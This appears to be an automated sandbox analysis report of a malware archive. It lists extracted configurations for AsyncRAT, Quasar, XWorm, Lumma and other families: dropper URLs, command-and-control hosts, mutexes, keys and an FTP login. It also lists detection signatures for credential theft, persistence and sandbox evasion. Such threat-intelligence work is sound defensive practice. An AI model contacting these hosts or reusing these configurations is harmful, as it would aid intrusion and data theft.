asyncrat | 16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267

max time kernel
1007s
max time network
1321s
platform
windows11-21h2_x64
resource
win11-20241023-en
resource tags

arch:x64arch:x86image:win11-20241023-enlocale:en-usos:windows11-21h2-x64system
submitted
27-11-2024 18:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Downloaders.zip
Size

12KB
MD5

94fe78dc42e3403d06477f995770733c
SHA1

ea6ba4a14bab2a976d62ea7ddd4940ec90560586
SHA256

16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267
SHA512

add85726e7d2c69068381688fe84defe820f600e6214eff029042e3002e9f4ad52dde3b8bb28f4148cca1b950cd54d3999ce9e8445c4562d1ef2efdb1c6bdeff
SSDEEP

384:6BfwcSEp9ZjKXSBIDv4dDfjlMJ7HWTHWB:efACW6Dr8HWTHWB

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://bitbucket.org/superappsss/1/downloads/papa_hr_build.exe

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://176.113.115.178/FF/3.png

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://176.113.115.178/FF/2.png

Extracted

Credentials

Protocol: ftp
Host:
216.146.202.21
Port:
21
Username:
admin
Password:
11111

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

ser.nrovn.xyz:6606

ser.nrovn.xyz:7707

ser.nrovn.xyz:8808

Mutex

nfMlxLKxWkbD

Attributes

delay
3
install
true
install_file
http.exe
install_folder
%AppData%

aes.plain

Extracted

Family

metasploit

Version

encoder/shikata_ga_nai

Extracted

Family

metasploit

Version

metasploit_stager

144.34.162.13:3333

Extracted

Family

cobaltstrike

http://�'�)��@��@'��u�.Qt�,��R�y��b� ��6��'\�<C+xS��ǎ}��0IޭQ�}�W��x��R8�&w�}�+yq��R.�kem:2470497230)��@��@'��u�.Qt�,��R�y��b� ��6��'\�<C+xS��ǎ}��0IޭQ�}�W��x��R8�&w�}�+yq��R.�kem

Extracted

Family

cryptbot

fivexc5pt.top

analforeverlovyu.top

Attributes

url_path
/v1/upload.php

Extracted

Family

quasar

Version

1.3.0.0

Botnet

sigorta

128.0.1.24:1604

Mutex

QSR_MUTEX_rVykraFS4RvYG92h8I

Attributes

encryption_key
Yjb2TFL9st7uVjRJpP63
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Quasar Client Startup
subdirectory
SubDir

Extracted

Family

xworm

147.185.221.22:47930

127.0.0.1:47930

Attributes

Install_directory
%AppData%
install_file
svchost.exe

Extracted

Family

xworm

Version

5.0

68.178.207.33:7000

Mutex

sSM7p4MT4JctLnRS

Attributes

install_file
USB.exe

aes.plain

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

127.0.0.1:4449

135.181.185.254:4449

212.15.49.155:4449

Mutex

fssssssshsfhs444fdf%dfs

Attributes

delay
11
install
false
install_folder
%AppData%

aes.plain

Extracted

Family

lumma

https://p3ar11fter.sbs

https://3xp3cts1aim.sbs

https://owner-vacat10n.sbs

https://peepburry828.sbs

https://p10tgrace.sbs

https://befall-sm0ker.sbs

https://librari-night.sbs

https://processhol.sbs

https://cook-rain.sbs

Extracted

Family

xworm

Version

3.1

18.181.154.24:7000

Mutex

w8DsMRIhXrOmk0Gn

Attributes

Install_directory
%AppData%
install_file
USB.exe

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat
Cobaltstrike
Detected malicious payload which is part of Cobaltstrike.
trojan backdoor cobaltstrike
Cobaltstrike family
cobaltstrike
CryptBot
CryptBot is a C++ stealer distributed widely in bundle with other software.
spyware stealer cryptbot
Cryptbot family
cryptbot

Detect PurpleFox Rootkit 4 IoCs

Detect PurpleFox Rootkit.

rootkit

resource	yara_rule
behavioral1/memory/255756-10532-0x0000000000400000-0x0000000000585000-memory.dmp	purplefox_rootkit
behavioral1/memory/256992-10528-0x0000000000400000-0x0000000000585000-memory.dmp	purplefox_rootkit
behavioral1/memory/255264-10548-0x0000000000400000-0x0000000000585000-memory.dmp	purplefox_rootkit
behavioral1/memory/255756-10549-0x0000000000400000-0x0000000000585000-memory.dmp	purplefox_rootkit

Detect Xworm Payload 5 IoCs

resource	yara_rule
behavioral1/files/0x001800000002aec3-4227.dat	family_xworm
behavioral1/memory/5332-4232-0x00000000004B0000-0x00000000004C8000-memory.dmp	family_xworm
behavioral1/files/0x001a00000002aedd-4320.dat	family_xworm
behavioral1/memory/5764-4327-0x0000000000C00000-0x0000000000C0E000-memory.dmp	family_xworm
behavioral1/memory/129424-7659-0x0000000000400000-0x0000000000410000-memory.dmp	family_xworm

Gh0st RAT payload 4 IoCs

resource	yara_rule
behavioral1/memory/255756-10532-0x0000000000400000-0x0000000000585000-memory.dmp	family_gh0strat
behavioral1/memory/256992-10528-0x0000000000400000-0x0000000000585000-memory.dmp	family_gh0strat
behavioral1/memory/255264-10548-0x0000000000400000-0x0000000000585000-memory.dmp	family_gh0strat
behavioral1/memory/255756-10549-0x0000000000400000-0x0000000000585000-memory.dmp	family_gh0strat

Gh0strat
Gh0st RAT is a remote access tool (RAT) with its source code public and it has been used by multiple Chinese groups.
rat gh0strat
Gh0strat family
gh0strat
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Metasploit family
metasploit
Phorphiex family
phorphiex

Phorphiex payload 1 IoCs

resource	yara_rule
behavioral1/files/0x001900000002ae15-2065.dat	family_phorphiex

Phorphiex, Phorpiex
Phorphiex or Phorpiex Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.
worm trojan loader phorphiex
PurpleFox
PurpleFox is an exploit kit used to distribute other malware families and first seen in 2018.
rootkit trojan purplefox
Purplefox family
purplefox

Quasar RAT 3 IoCs

Quasar is an open source Remote Access Tool.

trojan spyware quasar

description	flow	ioc	Process
	296	ip-api.com	Process not Found
Key created		\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	7zFM.exe
	345	ip-api.com	Process not Found

Quasar family
quasar

Quasar payload 2 IoCs

resource	yara_rule
behavioral1/files/0x001900000002aeb9-2552.dat	family_quasar
behavioral1/memory/4276-2557-0x0000000000ED0000-0x0000000000F2E000-memory.dmp	family_quasar

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

resource	yara_rule
behavioral1/memory/4448-2427-0x0000000000400000-0x0000000000428000-memory.dmp	family_redline

Redline family
redline

Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs

description	pid	Process	procid_target
PID 3900 created 3312	3900	1639833351.exe	52
PID 3900 created 3312	3900	1639833351.exe	52
PID 2792 created 3312	2792	winupsecvmgr.exe	52
PID 2792 created 3312	2792	winupsecvmgr.exe	52
PID 2792 created 3312	2792	winupsecvmgr.exe	52
PID 126756 created 3312	126756	Process not Found	52

Xmrig family
xmrig
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral1/files/0x001900000002ae0e-2055.dat	family_asyncrat

Contacts a large (2234) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	random.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	unik.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Process not Found

XMRig Miner payload 4 IoCs

miner

resource	yara_rule
behavioral1/memory/1564-2189-0x00007FF6C4020000-0x00007FF6C4C70000-memory.dmp	xmrig
behavioral1/memory/1564-2197-0x00007FF6C4020000-0x00007FF6C4C70000-memory.dmp	xmrig
behavioral1/memory/1564-2234-0x00007FF6C4020000-0x00007FF6C4C70000-memory.dmp	xmrig
behavioral1/memory/1564-2248-0x00007FF6C4020000-0x00007FF6C4C70000-memory.dmp	xmrig

Blocklisted process makes network request 1 IoCs

flow	pid	Process
896	112776	Process not Found

Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4000	powershell.exe
3260	powershell.exe
43024	Process not Found
4428	powershell.exe
112776	Process not Found
4800	powershell.exe
5428	powershell.exe
5492	powershell.exe
112804	Process not Found
128656	Process not Found
224300	Process not Found

Downloads MZ/PE file

Indicator Removal: Network Share Connection Removal 1 TTPs 4 IoCs

Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.

defense_evasion

Network Share Connection Removal

T1070.005

pid	Process
217884	Process not Found
250580	Process not Found
5088	Process not Found
7128	Process not Found

Checks BIOS information in registry 2 TTPs 6 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	random.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	random.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	unik.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	unik.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Process not Found

Drops startup file 8 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9758xBqgE1azKnB.lnk	Process not Found
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9758xBqgE1azKnB.lnk	Process not Found
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk	svchost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk	svchost.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url	Process not Found
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url	Process not Found
File opened for modification	\??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\zeuschat.url	Process not Found
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Run.lnk	Process not Found

Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
persistence privilege_escalation

Component Object Model Hijacking
T1546.015

Executes dropped EXE 64 IoCs

pid	Process
1680	random.exe
380	unik.exe
568	langla.exe
2732	o.exe
1564	xblkpfZ8Y4.exe
3432	1_encoded.exe
2956	test28.exe
2992	ufw.exe
4848	sysnldcvmr.exe
1160	test26.exe
644	test27.exe
2268	test29.exe
3492	test25.exe
916	test24.exe
1844	Setup2.exe
4668	http.exe
2656	149518748.exe
1388	tik-tok-1.0.5.0-installer_iPXA-F1.exe
4852	106579757.exe
3900	1639833351.exe
2032	main_v4.exe
4896	2230932668.exe
3016	TikTok18.exe
3948	TikTok18.exe
3680	saBSI.exe
2240	cock.exe
1680	646121280.exe
2792	winupsecvmgr.exe
400	papa_hr_build.exe
5052	papa_hr_build.exe
3268	fHR9z2C.exe
4276	ee.exe
5008	installer.exe
2192	installer.exe
2816	AmLzNi.exe
5288	2896510401.exe
5808	ServiceHost.exe
5400	UIHost.exe
4408	1079137770.exe
5200	papa_hr_build.exe
5164	papa_hr_build.exe
408	updater.exe
5332	svchost.exe
6076	Xworm%20V5.6.exe
1340	Y-Cleaner.exe
1944	tpeinf.exe
2296	1522032729.exe
5600	Xworm%20V5.6.exe
5764	XClient.exe
2836	VBVEd6f.exe
2088	test12.exe
5596	test6.exe
5572	test14.exe
6072	pantest.exe
6096	test9.exe
2924	Y-Cleaner.exe
3360	test10-29.exe
3308	safman_setup.exe
5628	safman_setup.tmp
1700	test19.exe
4640	test10.exe
5328	test_again4.exe
2488	Mesa.com
5148	test23.exe

Identifies Wine through registry keys 2 TTPs 3 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Wine	random.exe
Key opened	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Wine	unik.exe
Key opened	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Wine	Process not Found

Loads dropped DLL 16 IoCs

pid	Process
2192	installer.exe
5808	ServiceHost.exe
5808	ServiceHost.exe
5808	ServiceHost.exe
5808	ServiceHost.exe
5400	UIHost.exe
5400	UIHost.exe
6612	safman.exe
14044	Process not Found
36820	Process not Found
53428	Process not Found
129712	Process not Found
129712	Process not Found
129712	Process not Found
129712	Process not Found
129712	Process not Found

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 7 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\AppData\\Roaming\\NsMiner\\IMG001.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Windows\CurrentVersion\Run\9758xBqgE1azKnB = "C:\\Users\\Admin\\AppData\\Roaming\\9758xBqgE1azKnB.exe"	Process not Found
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysnldcvmr.exe"	o.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Windows\CurrentVersion\Run\Administrator = "C:\\ProgramData\\Microsoft\\csrss.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Users\\Admin\\sysnldcvmr.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\AppData\\Roaming\\NsMiner\\IMG001.exe"	Process not Found

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs

Web Service

T1102

flow	ioc
345	iplogger.org
367	iplogger.org
211	bitbucket.org
212	bitbucket.org
260	raw.githubusercontent.com
261	raw.githubusercontent.com
319	bitbucket.org

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
296	ip-api.com
345	ip-api.com

Network Service Discovery 1 TTPs 3 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
20316	Process not Found
218304	Process not Found
225264	Process not Found

Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135

Power Settings 1 TTPs 4 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
128224	Process not Found
128452	Process not Found
128652	Process not Found
128812	Process not Found

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x001e00000002aec2-2740.dat	autoit_exe

Detected potential entity reuse from brand MICROSOFT.
phishing microsoft

Enumerates processes with tasklist 1 TTPs 9 IoCs

discovery

Process Discovery

T1057

pid	Process
34972	Process not Found
45136	Process not Found
48748	Process not Found
1660	tasklist.exe
684	tasklist.exe
6092	tasklist.exe
120784	Process not Found
122728	Process not Found
3016	tasklist.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\Mozilla\\Firefox\\Desktop Background.bmp"	firefox.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

pid	Process
1680	random.exe
380	unik.exe
126316	Process not Found

Suspicious use of SetThreadContext 12 IoCs

description	pid	Process	procid_target
PID 2992 set thread context of 1768	2992	ufw.exe	149
PID 2240 set thread context of 4448	2240	cock.exe	201
PID 400 set thread context of 5052	400	papa_hr_build.exe	239
PID 2792 set thread context of 4280	2792	winupsecvmgr.exe	240
PID 2792 set thread context of 5704	2792	winupsecvmgr.exe	241
PID 5200 set thread context of 5164	5200	papa_hr_build.exe	375
PID 14044 set thread context of 20732	14044	Process not Found	2100
PID 53428 set thread context of 53772	53428	Process not Found	6306
PID 105908 set thread context of 106096	105908	Process not Found	12969
PID 105560 set thread context of 129424	105560	Process not Found	15848
PID 126756 set thread context of 134040	126756	Process not Found	17022
PID 134040 set thread context of 138488	134040	Process not Found	16947

UPX packed file 12 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x001900000002ae10-2078.dat	upx
behavioral1/memory/1564-2080-0x00007FF6C4020000-0x00007FF6C4C70000-memory.dmp	upx
behavioral1/memory/1564-2189-0x00007FF6C4020000-0x00007FF6C4C70000-memory.dmp	upx
behavioral1/memory/1564-2197-0x00007FF6C4020000-0x00007FF6C4C70000-memory.dmp	upx
behavioral1/memory/1564-2234-0x00007FF6C4020000-0x00007FF6C4C70000-memory.dmp	upx
behavioral1/memory/1564-2248-0x00007FF6C4020000-0x00007FF6C4C70000-memory.dmp	upx
behavioral1/memory/256992-10511-0x0000000000400000-0x0000000000585000-memory.dmp	upx
behavioral1/files/0x001700000002b3e0-10505.dat	upx
behavioral1/memory/255756-10532-0x0000000000400000-0x0000000000585000-memory.dmp	upx
behavioral1/memory/256992-10528-0x0000000000400000-0x0000000000585000-memory.dmp	upx
behavioral1/memory/255264-10548-0x0000000000400000-0x0000000000585000-memory.dmp	upx
behavioral1/memory/255756-10549-0x0000000000400000-0x0000000000585000-memory.dmp	upx

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files\McAfee\WebAdvisor\logic\oem_utils\oem_util.luc	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\MFW\packages\webadvisor\wa-ui-dialog-balloon.js	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-oem-ss-toast-variants-pt-PT.js	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\analyticstelemetry\context\subscriptionexpirydate.luc	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\analyticstelemetry\context\wpssubscriptionstatus.luc	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-checklist-tr-TR.js	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-ss-toast-variants-pl-PL.js	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-uninstall-nb-NO.js	installer.exe
File created	C:\Program Files\McAfee\Temp496036259\wa-utils.js	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\MFW\packages\nps\wa-controller-nps-checklist.js	installer.exe
File opened for modification	C:\Program Files\McAfee\Webadvisor\Analytics\transport_msgbus.js	ServiceHost.exe
File created	C:\Program Files\McAfee\Temp496036259\mcafeecerts.xml	installer.exe
File created	C:\Program Files\McAfee\Temp496036259\wa_install_close.png	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\logic\oem_utils\oem_utils_wss.luc	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\analyticstelemetry\context\browserinformation.luc	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\analyticstelemetry\events\sendimmediately.luc	installer.exe
File opened for modification	C:\Program Files\McAfee\Webadvisor\Analytics\events.json	ServiceHost.exe
File opened for modification	C:\Program Files\McAfee\Webadvisor\Analytics\profile.json	ServiceHost.exe
File created	C:\Program Files\McAfee\WebAdvisor\logic\oem_utils\affid_monitor.luc	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\MFW\packages_web_view\webadvisor\wa-controller-checklist.js	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-sstoast-it-IT.js	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-uninstall-hu-HU.js	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-upsell-toast-nl-NL.js	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\MFW\packages\webadvisor\twitter.png	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\MFW\packages\webadvisor\wa-checklist-status.png	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\MFW\packages\webadvisor\about-icon.png	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-sstoast-pps-fr-FR.js	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-upsell-toast-cs-CZ.js	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\logic\smart_toasting\selectors\smart_toast_template.luc	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\MFW\packages_web_view\builtin\wa-ui-checklist.js	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-oem-ss-toast-variants-ko-KR.js	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-pscore-toast-zh-CN.js	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\jslang\wa-score-toast-nl-NL.js	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\MFW\packages\webadvisor\new-tab-overlay.js	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\jslang\new-tab-res-toast-pl-PL.js	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-dialog-balloon-ru-RU.js	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\MFW\packages\webadvisor\aj_toasts\wa-aj-toast-toggle.html	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-sstoast-pps-nl-NL.js	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\jslang\wa-score-toast-hu-HU.js	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-webboost-cs-CZ.js	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\jslang\wa-score-toast-sv-SE.js	installer.exe
File created	C:\Program Files\McAfee\Temp496036259\jslang\eula-ko-KR.txt	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\MFW\packages\mwb\wa-mwb-checklist.html	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\MFW\packages\builtin\wa-ss-toast-variants-checkbox-checked.png	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\MFW\packages\webadvisor\wa-dialog-balloon.html	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\jslang\new-tab-res-toast-de-DE.js	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-sstoast-pps-hr-HR.js	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-sstoast-pps-it-IT.js	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\MFW\core\logger.luc	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\MFW\core\win32helper.luc	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\MFW\packages_web_view\webadvisor\wa-dwtoast.html	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-options-it-IT.js	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-sstoast-duckduckgo-sv-SE.js	installer.exe
File created	C:\Program Files\McAfee\Temp496036259\icon_failed.png	installer.exe
File created	C:\Program Files\McAfee\Temp496036259\settingmanager.cab	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\MFW\core\handlers.luc	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\MFW\packages\builtin\mcafee-logo-1.png	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\MFW\packages\webadvisor\wa-upsell-toast.css	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\edge.com.mcafee.webadvisor_v2.json	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-options-da-DK.js	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-uninstall-ko-KR.js	installer.exe
File created	C:\Program Files\McAfee\WebAdvisor\jslang\wa-res-upsell-toast-en-US.js	installer.exe
File created	C:\Program Files\McAfee\Webadvisor\Analytics\Scripts\subdb.js	ServiceHost.exe
File created	C:\Program Files\McAfee\Temp496036259\jslang\wa-res-shared-nl-NL.js	installer.exe

Drops file in Windows directory 23 IoCs

description	ioc	Process
File created	C:\Windows\sysnldcvmr.exe	Process not Found
File opened for modification	C:\Windows\CentralAvoiding	Process not Found
File opened for modification	C:\Windows\JoiningMazda	Process not Found
File opened for modification	C:\Windows\UruguayNorthern	Process not Found
File opened for modification	C:\Windows\RipeHaiti	VBVEd6f.exe
File opened for modification	C:\Windows\CameroonBuses	Process not Found
File opened for modification	C:\Windows\FlickrRealm	Process not Found
File opened for modification	C:\Windows\ConsolidationDistinct	Process not Found
File opened for modification	C:\Windows\VatBukkake	Process not Found
File opened for modification	C:\Windows\KeyboardsTwin	Process not Found
File opened for modification	C:\Windows\MozambiqueAppropriate	Process not Found
File created	C:\Windows\Tasks\UAC.job	Process not Found
File opened for modification	C:\Windows\PossessDescriptions	Process not Found
File opened for modification	C:\Windows\DownReceptor	Process not Found
File opened for modification	C:\Windows\ComfortSick	Process not Found
File opened for modification	C:\Windows\IdeasApp	Process not Found
File opened for modification	C:\Windows\OrganDiscretion	Process not Found
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File created	C:\Windows\sysnldcvmr.exe	o.exe
File opened for modification	C:\Windows\CoCurious	VBVEd6f.exe
File opened for modification	C:\Windows\BackedIma	Process not Found
File opened for modification	C:\Windows\sysnldcvmr.exe	o.exe
File opened for modification	C:\Windows\TeddySecretariat	Process not Found

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x001100000002b49d-7672.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Program crash 7 IoCs

pid	pid_target	Process	procid_target
1080	1680	WerFault.exe	136
3860	380	WerFault.exe	137
1500	400	WerFault.exe	213
5272	5200	WerFault.exe	245
20952	14044	Process not Found	2065
198480	1844	Process not Found	163
270748	7136	Process not Found	356

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
